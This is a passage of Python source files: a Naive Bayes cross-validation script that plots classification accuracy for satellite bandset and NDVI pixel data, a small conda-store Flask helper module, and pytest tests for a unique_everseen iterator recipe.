str(samples) + 'SamplesPrClassBandset_Random_' + datefiles[set] + '_resampled.csv' # Load training set test_set = loadTestSet(traning_set) X, Y = test_set.loadTestSet() # Set number of folds folds = 6 kf = KFold(n_splits=folds) kf.get_n_splits(X) metrics_array = [] fold = 0 test_spec_dict = {'Classifier': 'Naive Bayes', 'Date': testTimeConvertet, 'Host': hostname, 'Training Size': t_size, 'Training Set': traning_set, 'Sample Type': 'Bandset random field single pixel', 'Path': t_path, 'File': training_file} for train_index, test_index in kf.split(X): fold += 1 start_time = timeit.default_timer() X_train, X_test = X[train_index], X[test_index] y_train, y_test = Y[train_index], Y[test_index] # Naive Bayes y_pred = nbClassifier(X_train, y_train, X_test) # Calculate the different accuracy scores cm_metrics = Calculate_Metrics(y_test, y_pred) metrics_dict = cm_metrics.calculateScore() # Calculate the run time elapsed = (timeit.default_timer() - start_time) * 1000 metrics_dict.update({'Run Time(MSec)': elapsed}) # Create metrics for each fold # pdf_indi = printPDF(metrics_dict) # pdf_indi.create_pdf_indi(test_spec_dict, test_description, test_path_indi, # str(fold) + '_' + testTimeConvertet + '_' + hostname) metrics_array.append(metrics_dict) # Calculate the overall score for all the folds metrics_mean_dict = cm_metrics.calculate_mean_score(metrics_array, folds) # # Create PDF # pdf = printPDF(metrics_mean_dict) # pdf.create_pdf(test_spec_dict, test_description, test_path, str(x) + '_' + testTimeConvertet + '_' + hostname) # Create CSV csv = printCSV(metrics_mean_dict, test_spec_dict) csv.createCSV(path, csvfile_name) # Get Scores y_results.append((metrics_mean_dict['accuracy_normalized'])*100) x.append(t_size) plt.plot(x, y_results, filled_markers[set], label=datefiles[set]) title = 'Bandset with random pixels from - \n ' + '19$^{th}$ of March' + ', ' + '11$^{th}$ of April' + ', ' + '8$^{th}$ of May' + ', ' + '15$^{th}$ of Sep, 2016' figfile = 'CombiBandsetRandomPixel_Accuracy_AllDates.pdf' #plt.xticks(np.arange(25,375,25)) plt.ylim([10, 95]) # plt.xlim([0, 16]) plt.title(title) plt.ylabel('Accuracy(%)') plt.xlabel('Training Size') plt.grid(True) lgd = plt.legend(loc='upper center', bbox_to_anchor=(0.5, -0.10), ncol=7, prop={'size': 10}) plt.savefig(figfile, dpi=600, format='pdf', bbox_extra_artists=(lgd,), bbox_inches='tight') plt.clf() print "Done" # Mean Pixel Values for set in range(0, 4): y_results = [] x = [] for i in range(1, 15): samples = i * 30 t_size = (samples/6)*5 ## Overall configurations hostname = socket.gethostname() testStart = time.strftime("(%Y-%m-%d)") testStartConvertet = time.strftime("(%Y-%m-%d)-(%H-%M-%S)") path = str(t_size) + '_' + dates[set] + '_Mean' + '_' + testStart + '_' + hostname + '/' # Overall configurations try: os.makedirs(path) except OSError: if not os.path.isdir(path): raise ## Test Description test_description = 'Naive Bayes Test. From Date' + dates[set] + '.With -- Mean pixels pr class. Using 6-folds cross validation' ## Induvidual test configurations testTime = datetime.datetime.now() testTimeConvertet = time.strftime("(%Y-%m-%d)-(%H-%M-%S)") csvfilename = time.strftime("(%Y-%m-%d)") csvfile_name = str(t_size) + '_' + csvfilename + '.csv' test_path = path + str(t_size) + '/' test_path_indi = path + str(t_size) + '/' + 'Folds/' try: os.makedirs(test_path) except OSError: if not os.path.isdir(test_path): raise try: os.makedirs(test_path_indi) except OSError: if not os.path.isdir(test_path_indi): raise print "Naive Bayes Test: " + str(t_size) + ' | ' + str(samples) + " Time: " + testTimeConvertet # Training Set Path setup t_path = '../Classify Set/Mean Pixel Value/' + dates[set] + '/' training_file = str(samples) + 'SamplesPrClassBandset_Mean_' + datefiles[set] + '_resampled.csv' traning_set = t_path + str(samples) + 'SamplesPrClassBandset_Mean_' + datefiles[set] + '_resampled.csv' # Load training set test_set = loadTestSet(traning_set) X, Y = test_set.loadTestSet() # Set number of folds folds = 6 kf = KFold(n_splits=folds) kf.get_n_splits(X) metrics_array = [] fold = 0 test_spec_dict = {'Classifier': 'Naive Bayes', 'Date': testTimeConvertet, 'Host': hostname, 'Training Size': t_size, 'Training Set': traning_set, 'Sample Type': 'Bandset Mean field single pixel', 'Path': t_path, 'File': training_file} for train_index, test_index in kf.split(X): fold += 1 start_time = timeit.default_timer() X_train, X_test = X[train_index], X[test_index] y_train, y_test = Y[train_index], Y[test_index] # Naive Bayes y_pred = nbClassifier(X_train, y_train, X_test) # Calculate the different accuracy scores cm_metrics = Calculate_Metrics(y_test, y_pred) metrics_dict = cm_metrics.calculateScore() # Calculate the run time elapsed = (timeit.default_timer() - start_time) * 1000 metrics_dict.update({'Run Time(MSec)': elapsed}) # Create metrics for each fold # pdf_indi = printPDF(metrics_dict) # pdf_indi.create_pdf_indi(test_spec_dict, test_description, test_path_indi, # str(fold) + '_' + testTimeConvertet + '_' + hostname) metrics_array.append(metrics_dict) # Calculate the overall score for all the folds metrics_mean_dict = cm_metrics.calculate_mean_score(metrics_array, folds) # # Create PDF # pdf = printPDF(metrics_mean_dict) # pdf.create_pdf(test_spec_dict, test_description, test_path, str(x) + '_' + testTimeConvertet + '_' + hostname) # Create CSV csv = printCSV(metrics_mean_dict, test_spec_dict) csv.createCSV(path, csvfile_name) # Get Scores y_results.append((metrics_mean_dict['accuracy_normalized'])*100) x.append(t_size) plt.plot(x, y_results, filled_markers[set], label=datefiles[set]) title = 'Bandset with mean pixels from - \n ' + '19$^{th}$ of March' + ', ' + '11$^{th}$ of April' + ', ' + '8$^{th}$ of May' + ', ' + '15$^{th}$ of Sep, 2016' figfile = 'CombiBandsetMeanPixel_Accuracy_AllDates.pdf' #plt.xticks(np.arange(25,375,25)) plt.ylim([10, 90]) # plt.xlim([0, 16]) plt.title(title) plt.ylabel('Accuracy(%)') plt.xlabel('Training Size') plt.grid(True) lgd = plt.legend(loc='upper center', bbox_to_anchor=(0.5, -0.10), ncol=7, prop={'size': 10}) plt.savefig(figfile, dpi=600, format='pdf', bbox_extra_artists=(lgd,), bbox_inches='tight') plt.clf() print "Done" ## Merged Mean Pixel Values y_results = [] x = [] for i in range(1, 15): samples = i * 30 t_size = (samples/6)*5 elapsedTraining1 = 0 elapsedTesting2 = 0 ## Overall configurations hostname = socket.gethostname() testStart = time.strftime("(%Y-%m-%d)") testStartConvertet = time.strftime("(%Y-%m-%d)-(%H-%M-%S)") path = str(t_size) + '_0805_1104_1509_1903' + '_Combi_Mean' + '_' + testStart + '_' + hostname + '/' # Overall configurations try: os.makedirs(path) except OSError: if not os.path.isdir(path): raise ## Test Description test_description = 'Naive Bayes Test. From Date.With -- Merged Mean pixels pr class. Using 6-folds cross validation' ## Induvidual test configurations testTime = datetime.datetime.now() testTimeConvertet = time.strftime("(%Y-%m-%d)-(%H-%M-%S)") csvfilename = time.strftime("(%Y-%m-%d)") csvfile_name = str(t_size) + '_' + csvfilename + '.csv' test_path = path + str(t_size) + '/' test_path_indi = path + str(t_size) + '/' + 'Folds/' try: os.makedirs(test_path) except OSError: if not os.path.isdir(test_path): raise try: os.makedirs(test_path_indi) except OSError: if not os.path.isdir(test_path_indi): raise print "Naive Bayes Test: " + str(t_size) + ' | ' + str(samples) + " Time: " + testTimeConvertet # Training Set Path setup t_path = '../Classify Set/Mean Pixel Value/Merged Sets/All/' training_file = str(samples) + 'SamplesPrClassRandom_0805_1104_1509_1903_Mean_resampled.csv' traning_set = t_path + str(samples) + 'SamplesPrClassRandom_0805_1104_1509_1903_Mean_resampled.csv' # Load training set test_set = loadTestSet(traning_set) X, Y = test_set.loadTestSet() # Set number of folds folds = 6 kf = KFold(n_splits=folds) kf.get_n_splits(X) metrics_array = [] fold = 0 test_spec_dict = {'Classifier': 'Naive Bayes', 'Date': testTimeConvertet, 'Host': hostname, 'Training Size': t_size, 'Training Set': traning_set, 'Sample Type': 'Bandset Merged Mean field single pixel', 'Path': t_path, 'File': training_file} for train_index, test_index in kf.split(X): fold += 1 start_time = timeit.default_timer() X_train, X_test = X[train_index], X[test_index] y_train, y_test = Y[train_index], Y[test_index] # Naive Bayes elapsedTraining, elapsedTesting,y_pred = nbClassifier(X_train, y_train, X_test) elapsedTraining1 += elapsedTraining elapsedTesting2 += elapsedTesting # Calculate the different accuracy scores cm_metrics = Calculate_Metrics(y_test, y_pred) metrics_dict = cm_metrics.calculateScore() # Calculate the run time elapsed = (timeit.default_timer() - start_time) * 1000 metrics_dict.update({'Run Time(MSec)': elapsed}) # # Create metrics for each fold # pdf_indi = printPDF(metrics_dict) # pdf_indi.create_pdf_indi(test_spec_dict, test_description, test_path_indi, # str(fold) + '_' + testTimeConvertet + '_' + hostname) metrics_array.append(metrics_dict) # Calculate the overall score for all the folds metrics_mean_dict = cm_metrics.calculate_mean_score(metrics_array, folds) print 'Time in ms for training: ' + str(elapsedTraining1 / 6) print 'Time in ms for testing: ' + str(elapsedTesting2 / 6) # # # Create PDF # pdf = printPDF(metrics_mean_dict) # pdf.create_pdf(test_spec_dict, test_description, test_path, str(x) + '_' + testTimeConvertet + '_' + hostname) # Create CSV csv = printCSV(metrics_mean_dict, test_spec_dict) csv.createCSV(path, csvfile_name) # Get Scores y_results.append((metrics_mean_dict['accuracy_normalized'])*100) x.append(t_size) plt.plot(x, y_results, filled_markers[set], label='Mean merged') print "Done" # Merged Random Pixel Values y_results = [] x = [] for i in range(1, 15): samples = i * 30 t_size = (samples/6)*5 ## Overall configurations hostname = socket.gethostname() testStart = time.strftime("(%Y-%m-%d)") testStartConvertet = time.strftime("(%Y-%m-%d)-(%H-%M-%S)") path = str(t_size) + '_0805_1104_1509_1903' + '_Combi_Random' + '_' + testStart + '_' + hostname + '/' # Overall configurations try: os.makedirs(path) except OSError: if not os.path.isdir(path): raise ## Test Description #test_description = 'Naive Bayes Test. From Date' + dates[set] + '.With -- Merged Mean pixels pr class. Using 6-folds cross validation' ## Induvidual test configurations testTime = datetime.datetime.now() testTimeConvertet = time.strftime("(%Y-%m-%d)-(%H-%M-%S)") csvfilename = time.strftime("(%Y-%m-%d)") csvfile_name = str(t_size) + '_' + csvfilename + '.csv' test_path = path + str(t_size) + '/' test_path_indi = path + str(t_size) + '/' + 'Folds/' try: os.makedirs(test_path) except OSError: if not os.path.isdir(test_path): raise try: os.makedirs(test_path_indi) except OSError: if not os.path.isdir(test_path_indi): raise print "Naive Bayes Test: " + str(t_size) + ' | ' + str(samples) + " Time: " + testTimeConvertet # Training Set Path setup t_path = '../Classify Set/Random Pixels/Merged Sets/0805_1104_1509_1903/' training_file = str(samples) + 'SamplesPrClassBandset_Random_0805_1104_1509_1903_resampled.csv' traning_set = t_path + str(samples) + 'SamplesPrClassBandset_Random_0805_1104_1509_1903_resampled.csv' # Load training set test_set = loadTestSet(traning_set) X, Y = test_set.loadTestSet() # Set number of folds folds = 6 kf = KFold(n_splits=folds) kf.get_n_splits(X) metrics_array = [] fold = 0 test_spec_dict = {'Classifier': 'Naive Bayes', 'Date': testTimeConvertet, 'Host': hostname, 'Training Size': t_size, 'Training Set': traning_set, 'Sample Type': 'Bandset Merged Random field single pixel', 'Path': t_path, 'File': training_file} for train_index, test_index in kf.split(X): fold += 1 start_time = timeit.default_timer() X_train, X_test = X[train_index], X[test_index] y_train, y_test = Y[train_index], Y[test_index] # Naive Bayes y_pred = nbClassifier(X_train, y_train, X_test) # Calculate the different accuracy scores cm_metrics = Calculate_Metrics(y_test, y_pred) metrics_dict = cm_metrics.calculateScore() # Calculate the run time elapsed = (timeit.default_timer() - start_time) * 1000 metrics_dict.update({'Run Time(MSec)': elapsed}) # Create metrics for each fold # pdf_indi = printPDF(metrics_dict) # pdf_indi.create_pdf_indi(test_spec_dict, test_description, test_path_indi, # str(fold) + '_' + testTimeConvertet + '_' + hostname) metrics_array.append(metrics_dict) # Calculate the overall score for all the folds metrics_mean_dict = cm_metrics.calculate_mean_score(metrics_array, folds) # # Create PDF # pdf = printPDF(metrics_mean_dict) # pdf.create_pdf(test_spec_dict, test_description, test_path, str(x) + '_' + testTimeConvertet + '_' + hostname) # Create CSV csv = printCSV(metrics_mean_dict, test_spec_dict) csv.createCSV(path, csvfile_name) # Get Scores y_results.append((metrics_mean_dict['accuracy_normalized'])*100) x.append(t_size) plt.plot(x, y_results, filled_markers[set], label='Random merged') title = 'Mean merged and random merged data sets (Id:5) and (Id:10) at - \n ' + '19$^{th}$ of March' + ', ' + '11$^{th}$ of April' + ', ' + '8$^{th}$ of May' + ', ' + '15$^{th}$ of Sep, 2016' figfile = 'MergedBandsetMeanRandomPixel_Accuracy_AllDates.pdf' #plt.xticks(np.arange(25,375,25)) plt.ylim([10, 90]) # plt.xlim([0, 16]) plt.title(title) plt.ylabel('Accuracy(%)') plt.xlabel('Training Size') plt.grid(True) lgd = plt.legend(loc='upper center', bbox_to_anchor=(0.5, -0.10), ncol=7, prop={'size': 10}) plt.savefig(figfile, dpi=600, format='pdf', bbox_extra_artists=(lgd,), bbox_inches='tight') plt.clf() print "Done" # NDVI Random Pixel Values for set in range(0, 4): y_results = [] x = [] for i in range(1, 15): samples = i * 30 t_size = (samples/6)*5 ## Overall configurations hostname = socket.gethostname() testStart = time.strftime("(%Y-%m-%d)") testStartConvertet = time.strftime("(%Y-%m-%d)-(%H-%M-%S)") path = str(t_size) + '_' + dates[set] + '_NDVIRandom' + '_' + testStart + '_' + hostname + '/' # Overall configurations try: os.makedirs(path) except OSError: if not os.path.isdir(path): raise ## Test Description test_description = 'Naive Bayes Test. From Date' + dates[set] + '.With -- Random pixels pr class. Using 6-folds cross validation' ## Induvidual test configurations testTime = datetime.datetime.now() testTimeConvertet = time.strftime("(%Y-%m-%d)-(%H-%M-%S)") csvfilename = time.strftime("(%Y-%m-%d)") csvfile_name = str(t_size) + '_' + csvfilename + '.csv' test_path = path + str(t_size) + '/' test_path_indi = path + str(t_size) + '/' + 'Folds/' try: os.makedirs(test_path) except OSError: if not os.path.isdir(test_path): raise try: os.makedirs(test_path_indi) except OSError: if not os.path.isdir(test_path_indi): raise print "Naive Bayes Test: " + str(t_size) + ' | ' + str(samples) + " Time: " + testTimeConvertet # Training Set Path setup t_path = '../Classify Set/NDVI/' + dates[set] + '/Single Random/' training_file = str(samples) + 'SamplesPrClassNDVI_Random_' + datefiles[set] + '_resampled.csv' traning_set = t_path + str(samples) + 'SamplesPrClassNDVI_Random_' + datefiles[set] + '_resampled.csv' # Load training set test_set = loadTestSet(traning_set) X, Y = test_set.loadTestSet() # Set number of folds folds = 6 kf = KFold(n_splits=folds) kf.get_n_splits(X) metrics_array = [] fold = 0 test_spec_dict = {'Classifier': 'Naive Bayes', 'Date': testTimeConvertet, 'Host': hostname, 'Training Size': t_size, 'Training Set': traning_set, 'Sample Type': 'Bandset random field single pixel', 'Path': t_path, 'File': training_file} for train_index, test_index in kf.split(X): fold += 1 start_time = timeit.default_timer() X_train, X_test = X[train_index], X[test_index] y_train, y_test = Y[train_index], Y[test_index] # Naive Bayes y_pred = nbClassifier(X_train, y_train, X_test) # Calculate the different accuracy scores cm_metrics = Calculate_Metrics(y_test, y_pred) metrics_dict = cm_metrics.calculateScore() # Calculate the run time elapsed = (timeit.default_timer() - start_time) * 1000 metrics_dict.update({'Run Time(MSec)': elapsed}) # Create metrics for each fold # pdf_indi = printPDF(metrics_dict) # pdf_indi.create_pdf_indi(test_spec_dict, test_description, test_path_indi, # str(fold) + '_' + testTimeConvertet + '_' + hostname) metrics_array.append(metrics_dict) # Calculate the overall score for all the folds metrics_mean_dict = cm_metrics.calculate_mean_score(metrics_array, folds) # # Create PDF # pdf = printPDF(metrics_mean_dict) # pdf.create_pdf(test_spec_dict, test_description, test_path, str(x) + '_' + testTimeConvertet + '_' + hostname) # Create CSV csv = printCSV(metrics_mean_dict, test_spec_dict) csv.createCSV(path, csvfile_name) # Get Scores y_results.append((metrics_mean_dict['accuracy_normalized'])*100) x.append(t_size) plt.plot(x, y_results, filled_markers[set], label=datefiles[set]) title = 'NDVI with random pixels from - \n ' + '19$^{th}$ of March' + ', ' + '11$^{th}$ of April' + ', ' + '8$^{th}$ of May' + ', ' + '15$^{th}$ of Sep, 2016' figfile = 'CombiBandsetNDVIRandomPixel_Accuracy_AllDates.pdf' #plt.xticks(np.arange(25,375,25)) plt.ylim([10, 90]) # plt.xlim([0, 16]) plt.title(title) plt.ylabel('Accuracy(%)') plt.xlabel('Training Size') plt.grid(True) lgd = plt.legend(loc='upper center', bbox_to_anchor=(0.5, -0.10), ncol=7, prop={'size': 10}) plt.savefig(figfile, dpi=600, format='pdf', bbox_extra_artists=(lgd,), bbox_inches='tight') plt.clf() print "Done" ## NDVI Mean Pixel Values for set in range(0, 4): y_results = [] x = [] for i in range(1, 15): samples = i * 30 t_size = (samples/6)*5 ## Overall configurations hostname = socket.gethostname() testStart = time.strftime("(%Y-%m-%d)") testStartConvertet = time.strftime("(%Y-%m-%d)-(%H-%M-%S)") path = str(t_size) + '_' + dates[set] + '_NDVIMean' + '_' + testStart + '_' + hostname + '/' # Overall configurations try: os.makedirs(path) except OSError: if not os.path.isdir(path): raise ## Test Description test_description = 'Naive Bayes Test. From Date' + dates[set] + '.With -- Random pixels pr class. Using 6-folds cross validation' ## Induvidual test configurations testTime = datetime.datetime.now() testTimeConvertet = time.strftime("(%Y-%m-%d)-(%H-%M-%S)") csvfilename = time.strftime("(%Y-%m-%d)") csvfile_name = str(t_size) + '_' + csvfilename + '.csv' test_path = path + str(t_size) + '/' test_path_indi = path + str(t_size) + '/' + 'Folds/' try: os.makedirs(test_path) except OSError: if not os.path.isdir(test_path): raise try: os.makedirs(test_path_indi) except OSError: if not os.path.isdir(test_path_indi): raise print "Naive Bayes Test: " + str(t_size) + ' | ' + str(samples) + " Time: " + testTimeConvertet # Training Set Path setup t_path = '../Classify Set/NDVI/' + dates[set] + '/Mean/' training_file = str(samples) + 'SamplesPrClassNDVI_' + datefiles[set] + '_Mean_resampled.csv' traning_set = t_path + str(samples) + 'SamplesPrClassNDVI_' + datefiles[set] + '_Mean_resampled.csv' # Load training set test_set = loadTestSet(traning_set) X, Y = test_set.loadTestSet() # Set number of folds folds = 6 kf = KFold(n_splits=folds) kf.get_n_splits(X) metrics_array = [] fold = 0 test_spec_dict = {'Classifier': 'Naive Bayes', 'Date': testTimeConvertet, 'Host': hostname, 'Training Size': t_size, 'Training Set': traning_set, 'Sample Type': 'Bandset random field single pixel', 'Path': t_path, 'File': training_file} for train_index, test_index in kf.split(X): fold += 1 start_time = timeit.default_timer() X_train, X_test = X[train_index], X[test_index] y_train, y_test = Y[train_index], Y[test_index] # Naive Bayes y_pred = nbClassifier(X_train, y_train, X_test) # Calculate the different accuracy scores cm_metrics = Calculate_Metrics(y_test, y_pred) metrics_dict = cm_metrics.calculateScore() # Calculate the run time elapsed = (timeit.default_timer() - start_time) * 1000 metrics_dict.update({'Run Time(MSec)': elapsed}) # Create metrics for each fold # pdf_indi = printPDF(metrics_dict) # pdf_indi.create_pdf_indi(test_spec_dict, test_description, test_path_indi, # str(fold) + '_' + testTimeConvertet + '_' + hostname) metrics_array.append(metrics_dict) # Calculate the overall score for all the folds metrics_mean_dict = cm_metrics.calculate_mean_score(metrics_array, folds) # # Create PDF # pdf = printPDF(metrics_mean_dict) # pdf.create_pdf(test_spec_dict, test_description, test_path, str(x) + '_' + testTimeConvertet + '_' + hostname) # Create CSV csv = printCSV(metrics_mean_dict, test_spec_dict) csv.createCSV(path, csvfile_name) # Get Scores y_results.append((metrics_mean_dict['accuracy_normalized'])*100) x.append(t_size) plt.plot(x, y_results, filled_markers[set], label=datefiles[set]) title = 'NDVI with mean pixels from - \n ' + '19$^{th}$ of March' + ', ' + '11$^{th}$ of April' + ', ' + '8$^{th}$ of May' + ', ' + '15$^{th}$ of Sep, 2016' figfile = 'CombiBandsetNDVIMeanPixel_Accuracy_AllDates.pdf' #plt.xticks(np.arange(25,375,25)) plt.ylim([10, 90]) # plt.xlim([0, 16]) plt.title(title) plt.ylabel('Accuracy(%)') plt.xlabel('Training Size') plt.grid(True) lgd = plt.legend(loc='upper center', bbox_to_anchor=(0.5, -0.10), ncol=7, prop={'size': 10}) plt.savefig(figfile, dpi=600, format='pdf', bbox_extra_artists=(lgd,), bbox_inches='tight') plt.clf() print "Done" ## Merged NDVI Mean Pixel Values y_results = [] x = [] for i in range(1, 15): samples = i * 30 t_size = (samples/6)*5 ## Overall configurations hostname = socket.gethostname() testStart = time.strftime("(%Y-%m-%d)") testStartConvertet = time.strftime("(%Y-%m-%d)-(%H-%M-%S)") path = str(t_size) + '_0805_1104_1509_1903' + '_Combi_NDVIMean' + '_' + testStart + '_' + hostname + '/' # Overall configurations try: os.makedirs(path) except OSError: if not os.path.isdir(path): raise ## Test Description test_description = 'Naive Bayes Test. From Date' + dates[set] + '.With -- Merged Mean pixels pr class. Using 6-folds cross validation' ## Induvidual test configurations testTime = datetime.datetime.now() testTimeConvertet = time.strftime("(%Y-%m-%d)-(%H-%M-%S)") csvfilename = time.strftime("(%Y-%m-%d)") csvfile_name = str(t_size) + '_' + csvfilename + '.csv' test_path = path + str(t_size) + '/' test_path_indi = path + str(t_size) + '/' + 'Folds/' try: os.makedirs(test_path) except OSError: if not os.path.isdir(test_path): raise try: os.makedirs(test_path_indi) except OSError: if not os.path.isdir(test_path_indi): raise print "Naive Bayes Test: " + str(t_size) + ' | ' + str(samples) + " Time: " + testTimeConvertet # Training Set Path setup t_path = '../Classify Set/NDVI/Merged Sets/All/Mean/' training_file = str(samples) + 'SamplesPrClassNDVI_Random_0805_1104_1509_1903_Mean_resampled.csv' traning_set = t_path + str(samples) + 'SamplesPrClassNDVI_Random_0805_1104_1509_1903_Mean_resampled.csv' # Load training set test_set = loadTestSet(traning_set) X, Y = test_set.loadTestSet() # Set number of folds folds = 6 kf = KFold(n_splits=folds) kf.get_n_splits(X) metrics_array = [] fold = 0 test_spec_dict = {'Classifier': 'Naive Bayes', 'Date': testTimeConvertet, 'Host': hostname, 'Training Size': t_size, 'Training Set': traning_set, 'Sample Type': 'Bandset Merged Mean field single pixel', 'Path': t_path, 'File': training_file} for train_index, test_index in kf.split(X): fold += 1 start_time = timeit.default_timer() X_train, X_test = X[train_index], X[test_index] y_train, y_test = Y[train_index], Y[test_index] # Naive Bayes y_pred = nbClassifier(X_train, y_train, X_test) # Calculate the different accuracy scores cm_metrics = Calculate_Metrics(y_test, y_pred) metrics_dict = cm_metrics.calculateScore() # Calculate the run time elapsed = (timeit.default_timer() - start_time) * 1000 metrics_dict.update({'Run Time(MSec)': elapsed}) # Create metrics for each fold # pdf_indi = printPDF(metrics_dict) # pdf_indi.create_pdf_indi(test_spec_dict, test_description, test_path_indi, # str(fold) + '_' + testTimeConvertet + '_' + hostname) metrics_array.append(metrics_dict) # Calculate the overall score for all the folds metrics_mean_dict = cm_metrics.calculate_mean_score(metrics_array, folds) # # Create PDF # pdf = printPDF(metrics_mean_dict) # pdf.create_pdf(test_spec_dict, test_description, test_path, str(x) + '_' + testTimeConvertet + '_' + hostname) # Create CSV csv = printCSV(metrics_mean_dict, test_spec_dict) csv.createCSV(path, csvfile_name) # Get Scores y_results.append((metrics_mean_dict['accuracy_normalized'])*100) x.append(t_size) plt.plot(x, y_results, filled_markers[set], label='Mean') print "Done" ## Merged NDVI Random Pixel Values y_results = [] x = [] for i in range(1, 15): samples = i * 30 t_size = (samples/6)*5 ## Overall configurations hostname = socket.gethostname() testStart = time.strftime("(%Y-%m-%d)") testStartConvertet = time.strftime("(%Y-%m-%d)-(%H-%M-%S)") path = str(t_size) + '_0805_1104_1509_1903' + '_Combi_NDVI_Random' + '_' + testStart + '_' + hostname + '/' # Overall configurations try: os.makedirs(path) except OSError: if not os.path.isdir(path): raise ## Test Description test_description = 'Naive Bayes Test. From Date' + dates[set] + '.With -- Merged Mean pixels pr class. Using 6-folds cross validation' ## Induvidual test configurations testTime = datetime.datetime.now() testTimeConvertet = time.strftime("(%Y-%m-%d)-(%H-%M-%S)") csvfilename = time.strftime("(%Y-%m-%d)") csvfile_name = str(t_size) + '_' + csvfilename + '.csv' test_path = path + str(t_size) + '/' test_path_indi = path + str(t_size) + '/' + 'Folds/' try: os.makedirs(test_path) except OSError: if not os.path.isdir(test_path): raise try: os.makedirs(test_path_indi) except OSError: if not os.path.isdir(test_path_indi): raise print "Naive Bayes Test: " + str(t_size) + ' | ' + str(samples) + " Time: " + testTimeConvertet # Training Set Path setup t_path = '../Classify Set/NDVI/Merged Sets/All/Single Random/' training_file = str(samples) + 'SamplesPrClassNDVI_Random_0805_1104_1509_1903__resampled.csv' traning_set = t_path + str(samples) + 'SamplesPrClassNDVI_Random_0805_1104_1509_1903__resampled.csv' # Load training set test_set = loadTestSet(traning_set) X, Y = test_set.loadTestSet() # Set number of folds folds = 6 kf = KFold(n_splits=folds) kf.get_n_splits(X) metrics_array = [] fold = 0 test_spec_dict = {'Classifier': 'Naive Bayes', 'Date': testTimeConvertet, 'Host': hostname, 'Training Size': t_size, 'Training Set': traning_set, 'Sample Type': 'Bandset Merged Random field single pixel', 'Path': t_path, 'File': training_file} for train_index, test_index in kf.split(X): fold += 1 start_time = timeit.default_timer() X_train, X_test = X[train_index], X[test_index] y_train, y_test = Y[train_index], Y[test_index] # Naive Bayes y_pred = nbClassifier(X_train, y_train, X_test) # Calculate the different accuracy scores cm_metrics = Calculate_Metrics(y_test, y_pred) metrics_dict = cm_metrics.calculateScore() # Calculate the run time elapsed = (timeit.default_timer() - start_time) * 1000 metrics_dict.update({'Run Time(MSec)': elapsed}) # Create metrics for each fold # pdf_indi = printPDF(metrics_dict) # pdf_indi.create_pdf_indi(test_spec_dict, test_description, test_path_indi, # str(fold) + '_' + testTimeConvertet + '_' + hostname) metrics_array.append(metrics_dict) # Calculate the overall score for all the folds metrics_mean_dict = cm_metrics.calculate_mean_score(metrics_array, folds) # # Create PDF # pdf = printPDF(metrics_mean_dict) # pdf.create_pdf(test_spec_dict, test_description, test_path, str(x) + '_' + testTimeConvertet + '_' + hostname) # Create CSV csv = printCSV(metrics_mean_dict, test_spec_dict) csv.createCSV(path, csvfile_name) # Get Scores y_results.append((metrics_mean_dict['accuracy_normalized'])*100) x.append(t_size) plt.plot(x, y_results, filled_markers[set], label='Random') title = 'Merged NDVI with mean and random pixels at - \n ' + '19$^{th}$ of March' + ', ' + '11$^{th}$ of April' + ', ' + '8$^{th}$ of May' + ', ' + '15$^{th}$ of Sep, 2016' figfile = 'MergedNDVIMeanRandomPixel_Accuracy_AllDates.pdf' #plt.xticks(np.arange(25,375,25)) plt.ylim([10, 90]) # plt.xlim([0, 16]) plt.title(title) plt.ylabel('Accuracy(%)') plt.xlabel('Training Size') plt.grid(True) lgd = plt.legend(loc='upper center', bbox_to_anchor=(0.5, -0.10), ncol=7, prop={'size': 10}) plt.savefig(figfile, dpi=600, format='pdf', bbox_extra_artists=(lgd,), bbox_inches='tight') plt.clf() print "Done"

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3026011a06a16284e657bfbe253006c46ea4b535

196

py

Python

conda-store-server/conda_store_server/server/utils.py

peytondmurray/conda-store

40fe4a0cecbefaff7cac819244f9862bd188b045

[ "BSD-3-Clause" ]

47

2020-05-23T10:02:57.000Z

2022-03-18T00:14:58.000Z

conda-store-server/conda_store_server/server/utils.py

peytondmurray/conda-store

40fe4a0cecbefaff7cac819244f9862bd188b045

[ "BSD-3-Clause" ]

192

2020-06-12T02:05:14.000Z

2022-03-26T13:16:33.000Z

conda-store-server/conda_store_server/server/utils.py

peytondmurray/conda-store

40fe4a0cecbefaff7cac819244f9862bd188b045

[ "BSD-3-Clause" ]

15

2020-06-12T12:38:23.000Z

2021-11-11T00:39:57.000Z

from flask import current_app def get_conda_store(): return current_app.conda_store def get_server(): return current_app.server def get_auth(): return current_app.authentication

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py

Python

tests/test_unique_everseen.py

nxdevel/nx_itertools

744da75c616a8a7991b963a549152fe9c434abd9

[ "MIT" ]

null

tests/test_unique_everseen.py

nxdevel/nx_itertools

744da75c616a8a7991b963a549152fe9c434abd9

[ "MIT" ]

null

tests/test_unique_everseen.py

nxdevel/nx_itertools

744da75c616a8a7991b963a549152fe9c434abd9

[ "MIT" ]

null

"""Test for nx_itertools.recipes.unique_everseen""" from nx_itertools.recipes import unique_everseen def test_normal(): """Test unique_everseen.""" # no key with all upper data data = iter('AAAABBBCCDAABBB') res = unique_everseen(data) assert next(res) == 'A' assert list(res) == ['B', 'C', 'D'] assert list(data) == [] # no key with mixed data data = iter('AAAABBBcCcCDAABBB') res = unique_everseen(data) assert next(res) == 'A' assert list(res) == ['B', 'c', 'C', 'D'] assert list(data) == [] # lower key with mixed data - note key is unchanged from first instance data = iter('ABBCcAD') res = unique_everseen(data, lambda x: x.lower()) assert next(res) == 'A' assert list(res) == ['B', 'C', 'D'] assert list(data) == [] # lower key with mixed data - note key is unchanged from first instance data = iter('ABBcCcCAD') res = unique_everseen(data, lambda x: x.lower()) assert next(res) == 'A' assert list(res) == ['B', 'c', 'D'] assert list(data) == [] # empty data = () res = unique_everseen(data) assert list(res) == [] def test_normal_peek(): """Test unique_everseen with peeking at iterable.""" # no key with all upper data data = iter('ABAACCD') res = unique_everseen(data) assert next(res) == 'A' assert next(data) == 'B' assert list(res) == ['C', 'D'] assert list(data) == [] # no key with mixed data data = iter('ABCcAD') res = unique_everseen(data, lambda x: x.lower()) assert next(res) == 'A' assert next(data) == 'B' assert list(res) == ['C', 'D'] assert list(data) == [] # lower key with mixed data - note key is unchanged from first instance data = iter('ABcCcCAD') res = unique_everseen(data, lambda x: x.lower()) assert next(res) == 'A' assert next(data) == 'B' assert list(res) == ['c', 'D'] assert list(data) == [] # lower key with mixed data - note key is unchanged from first instance data = iter('ABBcCcCAD') res = unique_everseen(data, lambda x: x.lower()) assert next(res) == 'A' assert next(data) == 'B' assert list(res) == ['B', 'c', 'D'] # first B removed but second is still # there assert list(data) == []

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